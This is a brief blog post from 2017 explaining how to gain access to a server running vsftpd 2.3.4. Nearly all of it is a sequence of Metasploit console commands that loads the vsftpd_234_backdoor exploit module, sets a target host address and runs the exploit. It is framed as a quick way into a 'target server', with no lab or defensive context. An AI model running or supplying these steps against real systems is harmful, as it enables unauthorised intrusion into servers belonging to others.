Skip to content

Metasploit & vsftpd 2.3.4

2017-03-25 23:59:15

if you find that your target server use VSFTP 2.3.4, you are are in home, by metasploit you can get access to the server in less then 1 minute

msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit

rapid7/exploit